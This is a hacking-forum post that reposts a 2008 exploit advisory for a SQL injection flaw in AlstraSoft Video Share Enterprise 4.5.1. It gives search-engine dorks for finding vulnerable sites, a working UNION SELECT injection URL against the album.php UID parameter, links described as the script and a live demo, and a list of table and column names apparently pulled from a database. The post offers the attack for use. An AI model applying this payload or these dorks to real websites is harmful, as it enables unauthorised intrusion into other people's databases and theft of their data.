AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability

bymumi10

Üye
16 Eyl 2006
186
3
Rize
|___________________________________________________|
|
| Video Share Enterprise (UID) Remote SQL Injection Vulnerability
|
|___________________________________________________
|
| Author: Hussin X
|
| Home : www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
|
| script : https://tik.lat/0RZOl
|
| DorK : Powered By AlstraSoft Video Share Enterprise
| DorK : inurl:"album.php?UID="
| DorK : inurl:"view_picture.php?viewkey="
|___________________________________________________|

Exploit:


www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


L!VE DEMO: :

https://tik.lat/Fx30U

________________________
table_name : column_name


adv:adv_status
adv:adv_text
adv:adv_name
adv:adv_id
audio:embed
audio:be_rated
audio:be_comment
audio:filehome
audio:rate
audio:ratedby
audio:fav_num
audio:featured
audio:com_num
audio:viewnumber
audio:vkey
audio:country
audio:********
audio:record_date
audio:adddate
audio:addtime
audio:type
audio:duration
audio:duration
audio:flvdoname
audio:vdoname
audio:channel
audio:keyword
audio:featuredesc
audio:UID
audio:description
audio:VID

________________________

# milw0rm.com [2008-07-17]
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.